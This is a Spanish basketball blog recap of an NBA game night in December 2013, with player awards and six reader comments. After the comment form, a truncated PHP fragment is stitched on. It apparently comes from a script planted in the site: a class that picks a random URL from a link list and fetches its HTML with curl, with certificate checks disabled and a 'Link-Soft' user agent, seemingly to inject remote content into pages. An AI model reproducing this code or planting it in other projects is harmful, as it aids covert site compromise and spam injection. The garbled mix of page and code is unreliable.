La Crónica: Cambio de líder

17 de December de 2013 por Simon

Indiana perdió en casa ante Detroit y deja como líder de la liga a los Portland Trail Blazers. 8 partidos se disputaron y nos dejaron cosas muy interesantes como la constatación de que los Nets son otro equipo desde que volvió Deron, que el Madison sigue siendo territorio hospitalario para los visitantes y que los Clippers son capaces de vencer a cualquiera.

En el primer partido de la jornada llegó la gran sorpresa de la misma. Indiana era sorprendida en su propia casa por unos extraordinarios Pistons. No estoy seguro de si fue mérito de Detroit o demérito de los locales pero lo que sí está claro es que el partido se jugó al ritmo que pedía Detroit y los Pacers nunca se encontraron cómodos. Siempre fueron a remolque en el marcador y cuando se acercaban, una serie de canastas los volvían a dejar atrás. Además,  Josh Smith dominó de principio a fin en ambos lados de la cancha a Paul George y el potentístimo juego interior visitante controló el rebote por lo que la victoria cayó, merecidamente, del lado de  los Pistons (101-96).  Con esta importantísima victoria Detroit se sitúa en la quinta posición de su conferencia empatado en balance pero por detrás en la clasificación de Boston Celtics debido a la condición de líderes de división de los verdes. Los de Brad Stevens siguen con su buen  nivel de juego y vencieron a los Wolves en el Garden en un partido igualadísimo que se decidió en los minutos finales. Con uno abajo Wolves, 25 segundos y la pelota en manos de Barea, éste decidió tirarse un triple forzado e innecesario que ni tocó aro y en la siguiente jugada Boston anotó tomando ventaja de 3 puntos. Tras un tiempo muerto, Pekovic erró un mate lo que dejó el partido en bandeja para que Boston lo cerrara desde el tiro libre (97-101). 

De todas maneras, el gran partido de la jornada era, a priori, la visita de San Antonio al Staples Center para medirse a los Clippers, que volvían a casa después de casi 2 semanas de gira. Blake Griffin y Chris Paul dominaron el partido de principio a fin y dieron una auténtica exhibición ante unos Spurs que nunca se parecieron a ellos mismos. Tras un comienzo dubitativo en el que San Antonio dominó el marcador, los locales despertaron y ya en el inicio del segundo cuarto se pusieron por delante para no abandonar esa posición. A pesar del mal juego, de la mala noche de Parker y de las numerosas pérdidas, San Antonio consiguió que la ventaja no pasara de la decena de puntos durante el tercer cuarto pero en el último ya no resistieron más y fueron arrollados por unos Clippers que anotaron 37 puntos para terminar el partido con la mayor ventaja de la historia de los Clippers ante San Antonio (92-115). Por contra, para el otro equipo de Los Angeles las cosas siguen sin marchar y ayer sumaron una nueva derrota, esta vez ante los Hawks en Atlanta. Tras un primer tiempo favorable a los de púrpura y oro, los Hawks, capitaneados por Al Horford y Korver, dieron buena cuenta de los Lakers y con un parcial de 21-4 dieron la vuelta al partido consiguiendo ventajas entre 7-10 puntos. Esa ventaja y la defensa inexistente de los Lakers hizo el resto y la victoria se quedó en Atlanta (100-114).

En el Madison, Wizards y Knicks dejaron un partido muy bonito y emocionante que se resolvió de la manera más lógica posible. Si Bradley Beal, que regresó después de casi un mes de baja, es defendido por Beno Udrih y absolutamente nadie viene a ayudarlo, dale la bola y que gane el partido con una bandeja fácil.  Así fue como los Wizards se llevaron la victoria del Madison que les afianza en la sexta posición de la conferencia (102-101). Otro partido resulto por un solo punto fue la visita de Orlando al United Center de Chicago. Tras remontar un partido que dominaba Orlando por 17 puntos en el tercer cuarto, los Bulls tuvieron la oportunidad de mandarlo a la prórroga de la mano de Luol Deng que falló la bandeja y permitió a los Magic certificar su victoria desde el tiro libre (83-82). Los Bulls continúan cayendo en picado desde la lesión de Derrick Rose que les ha dejado muy tocados anímica y psicológicamente.

En el resto de partidos de la jornada tenemos las palizas que endosaron Miami y Brooklyn a Utah y Philadelphia en partidos que nunca tuvieron historia. Joe Johnson jugó su mejor partido en mucho tiempo y fue el mejor jugador de un equipo que se coloca a un solo partido de los Play Off (94-130). Por su parte, Lebron se quedó a un rebote y una asistencia del triple-doble (94-117)

PREMIOS

MVP: ¿Quién es este Joe Johnson que nos lo han cambiado? 37 puntos, 7 rebotes y 5 asistencias en 30 minutos. Si jugara cada día así justificaría su enorme salario. Incluso otra actuación sideral de Lebron James (30 puntos, 9 rebotes y 9 asistencias) queda en segundo plano.

Rookie: Buen partido de Tim Hardaway Jr. El jugador de los Knicks acabó con 14 puntos con un 5 de 6 en TC.

Sorpresa: Cuando Alec Burks tiene el día se convierte en un jugador peligrosísimo. Ayer se fue a los 31 puntos con un 12 de 17 en tiros de campo pero es que además repartió 7 asistencias y robó 4 balones.

Decepción: Si hay un juego interior capaz de superar a Roy Hibbert ese es el de los Pistons. El jugador de los Pacers fue superado en todo momento y acabó el partido con sólo 2 canastas de 12 intentos, 6 rebotes y 4 rebotes. Gordon Hayward y Trey Burke sólo fueron capaces de anotar 3 de sus 16 lanzamientos a canasta.

Esfuerzo en vano: El premio “Carmelo Anthony” se lo lleva Alec Burks y… Carmelo Anthony. 32 puntos, 3 rebotes, 5 asistencias, 4 tapones y derrota, como viene siendo habitual.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    No sé si ha pasado en otros partidos pero contra los Blazers,Detroit mejoró mucho en el apartado defensivo desde la última vez que los vi.Muchas ayudas,llegando al extrapase…muy bien en definitiva y es que esa debe ser una de sus armas.Supongo que contra Indiana se habrá visto algo de lo que digo.La derrota de los Pacers viene fenomenal a los Heat,porque ya se vislumbraba que a pesar de lo larga que es la temporada los Pacers serían inalcanzables.Con el partido Miami – Indiana en 2 días aún pueden recortar más esa desventaja.

    Partidazo de Webster desde el banquillo de los Wizards por cierto.

      Citar

  2. Denise dice:
    #2

    Jo jo la defensa de los Knicks en la ultima jugada es de chiste, Udrih solicitando ayuda por la izquierda y sus compis le dejan un pasillo a Beal para que resuelva el partido con una de las canastas mas faciles que habrá metido en su vida. Despues la resolución de Melo no me parece nada buena, gasta 3 de los 6 segundos que tenía en cruzar el centro del campo para despues tirarse un triple desequilibrado. Creo que podría haber tomado mejores decisiones y por algo, éste no le llega a los tobillos a Lebron y Durant.

    Gran partido de Detroit venciendo en Indiana, me encanta la plantilla de Detroit y tal y como están los Knicks y los Nets, deben ser quienes ocupen la 3º plaza del Este y son los unicos que veo capaces de eliminar a Miami e Indiana a 7 partidos, aunque para ello Jennings debe dar un paso adelante y Cheeks manejar mejor los cambios y los roles, no puede ser que Smith tire el doble que Monroe y Drummond juntos. Por lo demas, fisicamente es una bestialidad de equipo, dominado ayer el rebote (55-40) a posiblemente el otro equipo mas fisico de la liga, y maniatando a George e Hibbert.

    Gran noticia las 0 pérdidas de Oladipo, creo que debe ser el primer partido en que lo hace.

    Los Wolves para mi son una de las mayores decepciones de la liga, necesitan hacer ya algun trade si quieren dar un salto de calidad y meterse en Playoffs. Quitando a Love, Pek y Martin, el resto está jugando muy por debajo de sus posibilidades y Adelman no entiendo por qué ante el panorama tan feo que se vislumbra, no prueba a Muhammad y le da minutos.

      Citar

  3. The wolf dice:
    #3

    Denise:
    Despues la resolución de Melo no me parece nada buena, gasta 3 de los 6 segundos que tenía en cruzar el centro del campo para despues tirarse un triple desequilibrado.

    Y encima creo que todavía les quedaba un tiempo muerto a los Knicks

      Citar

  4. Denise dice:
    #4

    The wolf: Y encima creo que todavía les quedaba un tiempo muerto a los Knicks

    Pues si es así, que traspasen a Melo y despidan a Woodson. Vaya 2 estrategas..xD

      Citar

  5. Jose Luis dice:
    #5

    Les quedaba 1 time out, correcto.

      Citar

  6. Ruxixón dice:
    #6

    Leo por ahí que les quedaban 3 time out,o sea,que más leña al fuego.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>